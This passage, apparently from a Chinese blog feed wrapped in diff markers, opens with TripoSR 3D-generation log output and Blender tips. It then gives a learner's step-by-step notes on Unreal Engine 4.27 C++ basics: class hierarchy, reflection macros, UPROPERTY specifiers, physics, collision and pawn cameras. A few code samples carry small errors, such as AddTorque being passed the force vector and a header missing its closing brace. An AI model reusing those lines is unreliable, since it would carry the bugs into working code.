    2024-03-18 11:02:30,617 - INFO - Processing images finished in 23078.31ms.
    2024-03-18 11:02:30,617 - INFO - Running image 1/1 ...
    2024-03-18 11:02:30,618 - INFO - Running model ...
    2024-03-18 11:02:35,306 - INFO - Running model finished in 4686.22ms.
    2024-03-18 11:02:35,306 - INFO - Exporting mesh ...
    torchmcubes was not compiled with CUDA support, use CPU version instead.
    2024-03-18 11:02:37,869 - INFO - Exporting mesh finished in 2563.17ms.

    ​这个程序会自动帮你抠图:

    自动扣图

    ​不过抠得不是很好,导致生成的模型多了点背景信息。我们手动抠图再试一次:

    手动抠图

    ​用 Blender 打开这个模型,修复一下旋转。生成的模型显示不出纹理信息,按 stabilityai/TripoSR · It doesn’t save texture to the .obj? (huggingface.co) 所说,应该在 Blender 里设置一下材质(将 Color Attribute 节点连接到 Base Color 里,但好像有些模型还是不行……):

    设置材质

    ​顺便送这个模型一个 Decimate 减少一下面数再导出,真是太棒了!

    ]]>
    @@ -2787,7 +2787,7 @@ /posts/Software-Unreal%20%E8%99%9A%E5%B9%BB%20C++%20%E9%9B%B6%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/ - 资源

    环境配置

    ​还是把版本换成 UE4.27 吧,让它支持 VS2022。

    课程

    202-Unreal 项目文件结构解读

    一些子目录是在引擎和游戏项目目录之间通用的:

    • Binaries - 包含可执行文件或编译期间创建的其他文件。

    • Build - 包含构建引擎或游戏所需的文件,包括创建特定于平台的构建版所需的文件。

    • Config - 配置文件,用于设置用来控制引擎行为的值。项目 Config 文件中设置的值会覆盖 Engine\Config 目录中设置的值。

    • Content - 保存引擎或游戏的内容,包括资源包和贴图。

    • DerivedDataCache - 包含加载时针对引用内容生成的派生数据文件。引用内容没有相应的缓存文件会导致加载时间显著延长。

    • Intermediate - 包含构建引擎或游戏时生成的临时文件。在游戏目录中,着色器存储在 Intermediate 目录中。

    • Saved - 包含自动保存、配置(.ini)文件和日志文件。此外,Engine\Saved 目录还包含崩溃日志、硬件信息和 Swarm 选项与数据。

    • Source - 包含引擎或游戏的所有源文件,包括引擎源代码、工具和游戏类等。

      • Engine - Engine 目录中的源文件组织结构如下:

        • Developer - 编辑器和引擎共同使用的文件。
        • Editor - 仅供编辑器使用的文件。
        • Programs - 引擎或编辑器使用的外部工具。
        • Runtime - 仅供引擎使用的文件。
      • Game - 游戏项目源码,建议按模块的方式进行组织。

    ​迁移项目最小的单元是 ConfigContentXXX.uproject

    203-Unreal 缓存数据解读

    png

    ​Epic 中修改保管库的缓存位置。

    png

    ​这个路径存放着着色器的缓存。

    209-C++ 与蓝图的关系与选择

    C++ 与蓝图

    • 两者关系
      • 蓝图建立在 C++ 代码之上
      • 蓝图与 C++ 可以很好地协作
    • 理论平衡
      • C++ 由游戏逻辑程序员使用
        • 完成虚幻尚未封装的功能
        • 完成根据项目需求需要自定义的功能
      • 蓝图由游戏设计人员使用
        • 设计其他游戏资源
        • 功能测试时使用
        • 项目快速迭代时使用
        • 调用编写好的 C++ 代码

    什么是蓝图可视化脚本

    • 蓝图可视化脚本简称“蓝图”、“蓝图脚本”
    • 蓝图是一种可视化编程
      • 实际上,你使用蓝图的时候就是在编程
      • 蓝图是一种需要编译的面向对象的可视化编程语言
    • 蓝图完全集成在虚幻 4 中
    • 通过节点与连线工作

    什么是蓝图系统

    • 蓝图系统俗称“蓝图”、“蓝图类”
    • 将蓝图类想象成游戏内容的容器
      • 其可以包含组件
      • 其可以包含脚本
      • 其可以仅仅包含数据

    301-C++ 基础回顾与虚幻 C++ 类的继承结构

    虚幻引擎 C++ 类层级结构 (Hierarchy)

    • Object

      • 存放数据

      • 不能被放置到场景 (Level) 中

    • Actor

      • 能放置在场景 (Level) 中
      • 可以有视觉表现/可以被看到
    • Pawn

      • 可以被控制器 (Controller) 持有 (Possess)
    • Character

      • 有角色移动组件 (CharacterMovementComponent)
      • 具有适合角色的封装好的一系列功能

    一个 Object 不是 (Is NOT a) Actor

    一个 Object 不是一个 (Is NOT a) Pawn

    一个 Actor 是一个 (ls a) Object

    一个 Actor 不是一个 (Is NOT a) Pawn

    一个 Pawn 是 (ls a) Actor

    一个 Pawn 是 (ls a) Object

    png

    PackageWorldLevelActor 之间的关系。

    302-使用宏参与虚幻的反射与垃圾回收系统

    ​UE4 的反射系统允许在运行时获取类的信息、动态创建对象、调用函数等操作,而无需提前知道类的具体类型。通过反射系统,可以实现诸如蓝图编辑、插件系统、序列化和反序列化等功能。在 UE4 中,反射系统主要基于宏(macros)和元数据(metadata)来实现,开发者可以利用它来实现更灵活的代码设计和功能扩展。(在蓝图脚本中调用 C++ 的内容)

    ​UE4 的垃圾回收系统负责管理动态分配的内存,在运行时自动释放不再需要的内存空间,防止内存泄漏和提高性能。UE4 使用基于引用计数(reference counting)和标记-清除(mark and sweep)算法的混合方式来进行垃圾回收,确保及时释放不再使用的对象,并最大程度地减少性能损耗。

    png

    ​在定义类、变量、函数前分别加上 UCLASS()UPROPERTY()UFUNCTION() 这样的宏,就可以参与反射与垃圾回收系统,

    ​引用头文件时,#include "MyActor.generated.h" 务必放在所有引用的头文件的下方。

    303-创建自己的第一个 UObject 子类

    ​新建一个 C++ 项目。

    png

    ​项目中确保打开了 Show C++ Classes

    png

    ​所有 C++ 类都会被存放到 C++ Classes/项目名称 中。

    png

    ​在这个目录下创建一个 C++ class,打开 Show All Classes,创建一个 Object 类。

    png

    ​名字取为 MyObject,则会生成 MyObject.cppMyObject.h 两个文件。

    .cpp 文件是写逻辑用的,.h 文件是写声明用的。

    ​修改 MyObject.h 文件,然后保存:

    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()
    };

    ​通过在类声明前添加 UCLASS(Blueprintable) 宏,可以让该类在 UE4 的蓝图编辑器中可见,允许开发者使用蓝图来创建该类的实例、设置属性和调用函数(在蓝图脚本中调用 C++ 的内容)。

    png

    ​可以用 VS 的生成进行编译(有可能 UE4 没反应过来,但可以方便地显示中文的报错信息)。

    png

    ​也可以用 UE4 的 Compile 按钮编译。

    png

    ​此时所创建的类就可以 Create Blueprint class based on MyObject

    304-加快 Unreal 编译速度

    ​UE4.22 中,每次编译都会重新生成反射代码,影响编译速度(不知道 4.27 还有没有……)。

    ​课程中提到的解决方案是,安装路径下找到 Win64/UnrealHeaderTool.target,往其中的第二行加一个空格……真玄学。

    png

    305-创建 UObject 的蓝图类与基础宏参数介绍

    png

    ​对于之前所创建的 MyObject 类,选择 Create Blueprint class based on MyObject 以创建一个反射的蓝图,命名为 BP_MyObject

    ​编写 MyObject.h 的代码,给 MyObject 定义一个构造函数、float 类型变量 MyFloat,函数 MyFunction(),添加宏 UPROPERTY(BlueprintReadWrite) 使得变量和函数能在蓝图类中读写:

    // Fill out your copyright notice in the Description page of Project Settings.

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite)
    float MyFloat;

    UFUNCTION(BlueprintCallable)
    void MyFunction();
    };

    ​在 MyObject.cpp 里写实现(暂为空):

    #include "MyObject.h"

    UMyObject::UMyObject()
    {

    }

    void UMyObject::MyFunction()
    {

    }

    ​保存并编译。

    png

    ​此时在对应的蓝图中就可以创建相关的节点。

    png

    ​试一试!

    306-使用 UE_LOG 打印日志与在蓝图中实例化继承于 Object 的类

    ​修改 MyObject.h,宏中可以定义变量/函数属于哪个 Category

    #pragma once

    #include "CoreMinimal.h"
    #include "UObject/NoExportTypes.h"
    #include "MyObject.generated.h"

    /**
    *
    */
    UCLASS(Blueprintable)
    class MYPROJECT8_API UMyObject : public UObject
    {
    GENERATED_BODY()

    public:

    UMyObject();

    UPROPERTY(BlueprintReadWrite, Category = "My Variables")
    float MyFloat;

    UFUNCTION(BlueprintCallable, Category = "My Functions")
    void MyFunction();
    };

    MyObject.cpp 中写 MyFunction() 的实现,UE_LOG() 可以向控制台输出信息:

    #include "MyObject.h"

    UMyObject::UMyObject()
    {
    MyFloat = 0.0f;
    }

    void UMyObject::MyFunction()
    {
    UE_LOG(LogTemp, Log, TEXT("Hello World!"));
    UE_LOG(LogTemp, Warning, TEXT("Hello World!"));
    UE_LOG(LogTemp, Error, TEXT("Hello World!"));
    }

    png

    ​在关卡蓝图中,Construct Object from Class 可以将某个类实例化。

    png

    ​这么画关卡蓝图,实例化 BP_MyObject 类,调用其中的 MyFunction()

    png

    ​开跑!此时就会在 OutputLog 里输出相应信息。

    307-如何删除自定义的 C++ 类

    401-创建自己的 Actor 子类与学习类的命名规范

    png

    ​创建一个 Actor 的 C++ class。

    png

    ​路径保持默认(源教程在 Path 里添油加醋了个 /Actor 结果我这里编译出错,好像不太聪明的样子……算了我还是妥协好了,后来又想了想可能要改一下 #include "MyActor.h" 的位置),之后创建好了 MyActor.hMyActor.cpp

    ​看一下 MyActor.cpp,感觉很像 Unity 里的 Start()Update()

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }
    • 派生自 Actor 的类带有 A 前缀,如 AController
    • 派生自 Object 的类带有 U 前缀,如 UComponent
    • Enums 的前缀是 E,如 EFortificationType
    • Interface 的前缀通常是 I,如 lAbilitySystemInterface
    • Template 的前缀是 T,如 TArray
    • 派生自 SWidget 的类 (Slate Ul) 带有前缀 S,如 SButton
    • 其他类的前缀为字母 F,如 FVector

    ​看一看 MyActor.h 里的内容,虽然 UCLASS() 没有 Blueprintable,但是也可以执行 Create Blueprint class based on MyObject,这是因为所继承的类 AActor 自带 Blueprintable

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    402-组件简介与使用蓝图类扩展代码的优点

    ​略。这个蓝图跟 Unity 里的 prefab 蛮像的。

    403-在 C++ 中创建静态网格组件

    ​编辑 MyActor.h 里的内容,声明一个变量 UStaticMeshComponent* MyStaticMesh

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​编辑 MyActor.cpp 里的内容,在构造函数里设置 MyStaticMesh 里的值:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​如此做,对应的蓝图里就会显示构造函数创建的 MyStaticMesh

    png

    ​也可以不用蓝图直接将定义的 C++ class 拖到关卡中。

    404-导入模型与布置场景

    ​略。

    405-使用 SetActorLoction 控制位置与宏参数 EditInstanceOnly 介绍

    修改 MyActor.h 的内容,添加一个 FVector 类型的变量 InitLocation,上面添加修饰宏 UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector"),让这个值可以在实例中编辑:

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容,在 BeginPlay() 中将 Actor 的坐标设为 InitLocation 的值。

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​在蓝图实例中多了个设置 InitLocation 的地方,运行关卡会发现蓝图实例被正确地移动到了 InitLocation 的位置。

    406-VisibleInstanceOnly 与 EditDefaultsOnly

    ​修改 MyActor.h 里的内容,引入了两个新的宏参数:

    • VisibleInstanceOnly 只在实例中可见,不可编辑。
    • EditDefaultsOnly 只可在模板中编辑。

    ​将 bool 变量命名前加上前缀 b,UE 会自动识别并把前缀去除。

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    png

    ​开跑!可以看到宏变量 VisibleAnywhereEditInstanceOnlyVisibleInstanceOnlyEditDefaultsOnly 之间的区别。

    407-VisibleDefaultsOnly 与 EditAnywhere

    ​修改 MyActor.h 的内容,引入了两个新的宏参数:

    • VisibleDefaultsOnly 只在模板中可见(没有地方可以编辑,一般没什么卵用)。
    • EditAnywhere 在模板类和实例类中均可编辑。
    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

    png

    ​开跑!此时实例会每帧沿方向 (0.1, 0.1, 0.1) 移动。

    408-在编辑器中限制输入值的范围与不要将组件指针设为 EditAnywhere

    不要将组件指针设为 EditAnywhere

    UPROPERTY(EditAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    不要这么做!生成的界面会十分复杂,不友好!


    ​修改 MyActor.hTickLoactionOffset 的宏,如此做将在面板中限制变量的取值范围:

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    png

    409-简单碰撞与复杂碰撞

    ​教你认识 UE 里的碰撞,分为 简单碰撞复杂碰撞

    png

    410-模拟物理与重力

    png

    ​物体中若打开了 Physics 下的 Simulate Physics,则会开启物理。

    png

    ​给这个物体加一个简单的凸包碰撞。

    png

    ​开跑!按下 `` 键可以打开命令行,输出show Collision` 即可在视图中显示碰撞的具体位置。

    411-通过代码增加力与力矩

    ​修改 MyActor.h 里的内容,添加了变量力 FVector InitForce、力矩 FVector InitTorque 和 纯改变加速度(施加力的时候忽略质量)bAccelChange

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Actor.h"
    #include "MyActor.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyActor : public AActor
    {
    GENERATED_BODY()

    public:
    // Sets default values for this actor's properties
    AMyActor();

    UPROPERTY(VisibleAnywhere, Category = "My Actor Components")
    UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Vector")
    FVector InitLocation;

    UPROPERTY(VisibleInstanceOnly, Category = "My Actor Properties | Vector")
    FVector PlacedLocation;

    UPROPERTY(EditDefaultsOnly, Category = "My Actor Properties | Vector")
    bool bGotoInitLocation;

    UPROPERTY(VisibleDefaultsOnly, Category = "My Actor Properties | Vector")
    FVector WorldOrigin;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector", meta = (ClampMin = -5.0f, ClampMax = 5.0f, UIMin = -5.0f, UIMax = 5.0f))
    FVector TickLoactionOffset;

    UPROPERTY(EditAnywhere, Category = "My Actor Properties | Vector")
    bool bShouldMove;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitForce;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    FVector InitTorque;

    UPROPERTY(EditInstanceOnly, Category = "My Actor Properties | Physics")
    bool bAccelChange;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;
    };

    ​修改 MyActor.cpp 里的内容:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    MyStaticMesh->AddForce(InitForce, "NAME_None", bAccelChange);
    MyStaticMesh->AddTorque(InitForce, "NAME_None", bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset);
    }
    }

    MyStaticMesh-> 默认不可用,需从官方文档查找 UStaticMeshComponent 的属性:UStaticMeshComponent | Unreal Engine 5.2 Documentation 得到需引入 #include "Components/StaticMeshComponent.h"

    png

    ​此时在实例类中便可设置给对象初始化的力和力矩。

    png

    412-使用 Sweep 在不开启模拟物理的情况下进行碰撞

    ​在没有 Simulate Physics 的情况下,默认的碰撞是不会有效的,但是可以打开 Sweep 在不开启模拟物理的情况下进行碰撞。

    png

    ​修改 MyActor.cppAddActorLocalOffset(TickLoactionOffset, true); 便可在不使用物理的情况下进行碰撞:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    //MyStaticMesh->AddForce(InitForce, "NAME_None", bAccelChange);
    //MyStaticMesh->AddTorque(InitForce, "NAME_None", bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    AddActorLocalOffset(TickLoactionOffset, true);
    }
    }

    413-碰撞通道与击中信息

    png

    Collision 可以设置哪些碰撞有效,必须两个碰撞均是 Block 才可以阻挡。


    ​修改 MyActor.cpp 里的内容,FHitResult HitResultAddActorLocalOffset(TickLoactionOffset, true, &HitResult); 可以获取碰撞信息:

    #include "MyActor.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyActor::AMyActor()
    {
    // Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    InitLocation = FVector(0.0f);
    PlacedLocation = FVector(0.0f);
    bGotoInitLocation = false;
    WorldOrigin = FVector(0.0f);
    TickLoactionOffset = FVector(0.0f);
    bShouldMove = false;
    InitForce = FVector(0.0f);
    InitTorque = FVector(0.0f);
    bAccelChange = false;
    }

    // Called when the game starts or when spawned
    void AMyActor::BeginPlay()
    {
    Super::BeginPlay();

    PlacedLocation = GetActorLocation();
    if (bGotoInitLocation)
    SetActorLocation(InitLocation);
    //MyStaticMesh->AddForce(InitForce, "NAME_None", bAccelChange);
    //MyStaticMesh->AddTorque(InitForce, "NAME_None", bAccelChange);
    }

    // Called every frame
    void AMyActor::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    if (bShouldMove)
    {
    FHitResult HitResult;

    AddActorLocalOffset(TickLoactionOffset, true, &HitResult);
    UE_LOG(LogTemp, Warning, TEXT("X: %f, Y: %f, Z: %f"), HitResult.Location.X, HitResult.Location.Y, HitResult.Location.Z);
    }
    }

    png

    ​开跑!Output Log 将输出碰撞信息。

    414-其他常用函数与可探索部分

    ​略。

    501-创建自己的 Pawn 类、自己的根组件并将静态网格组件附加到其上

    png

    ​创建一个 Pawn 类型的 C++ Class,获得 MyPawn.hMyPawn.cpp

    ​编辑 MyPawn.h,定义变量 class UStaticMeshComponent* MyStaticMesh;,这个 class 可加可不加:

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    ​编辑 MyPawn.cpp,设置 RootComponent 的值(模板自带),设置 MyStaticMesh 的值并将其设为 RootComponent 的子节点:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();
    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);
    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);
    }

    ​编译。Create Blueprint class based on MyPawn

    png

    ​开跑!

    png

    502-为自己的 Pawn 设置相机组件

    ​修改 MyPawn.h,定义一个新的变量 class UCameraComponent* MyCamera;

    #pragma once

    #include "CoreMinimal.h"
    #include "GameFramework/Pawn.h"
    #include "MyPawn.generated.h"

    UCLASS()
    class MYPROJECT8_API AMyPawn : public APawn
    {
    GENERATED_BODY()

    public:
    // Sets default values for this pawn's properties
    AMyPawn();

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UStaticMeshComponent* MyStaticMesh;

    UPROPERTY(VisibleAnywhere, Category = "My Pawn Components")
    class UCameraComponent* MyCamera;

    protected:
    // Called when the game starts or when spawned
    virtual void BeginPlay() override;

    public:
    // Called every frame
    virtual void Tick(float DeltaTime) override;

    // Called to bind functionality to input
    virtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;

    };

    ​修改 MyPawn.cpp,设置好 MyCamera 的属性:

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
    // Set this pawn to call Tick() every frame. You can turn this off to improve performance if you don't need it.
    PrimaryActorTick.bCanEverTick = true;

    RootComponent = CreateDefaultSubobject<USceneComponent>(TEXT("RootComponent"));
    MyStaticMesh = CreateDefaultSubobject<UStaticMeshComponent>(TEXT("MyStaticMesh"));
    MyStaticMesh->SetupAttachment(GetRootComponent());

    MyCamera = CreateDefaultSubobject<UCameraComponent>(TEXT("MyCamera"));
    MyCamera->SetupAttachment(GetRootComponent());

    MyCamera->SetRelativeLocation(FVector(-300.0f, 0.0f, 300.0f));
    MyCamera->SetRelativeRotation(FRotator(-45.0f, 0.0f, 0.0f));
    }

    // Called when the game starts or when spawned
    void AMyPawn::BeginPlay()
    {
    Super::BeginPlay();

    }

    // Called every frame
    void AMyPawn::Tick(float DeltaTime)
    {
    Super::Tick(DeltaTime);

    }

    // Called to bind functionality to input
    void AMyPawn::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)
    {
    Super::SetupPlayerInputComponent(PlayerInputComponent);

    }

    ​开跑!

    png

    503-设置 GameMode 并自动持有 Pawn

    png

    ​对于 C++ Classes 下的 GameModeBase,创建游戏模式蓝图 Create Blueprint class based on ...

    png

    ​在创建的蓝图中的 Class Defaults,将 Default Pawn Class 设置为 BP_MyPawn

    png

    ​关卡中的 World Settings,设置好 GameMode Override

    png

    BP_MyPawn 中设置好 Auto Possess PlayerPlayer 0,或者直接修改 MyPawn.cpp,添加语句 AutoPossessPlayer = EAutoReceiveInput::Player0;

    #include "MyPawn.h"
    #include "Components/StaticMeshComponent.h"
    #include "Camera/CameraComponent.h"

    // Sets default values
    AMyPawn::AMyPawn()
    {
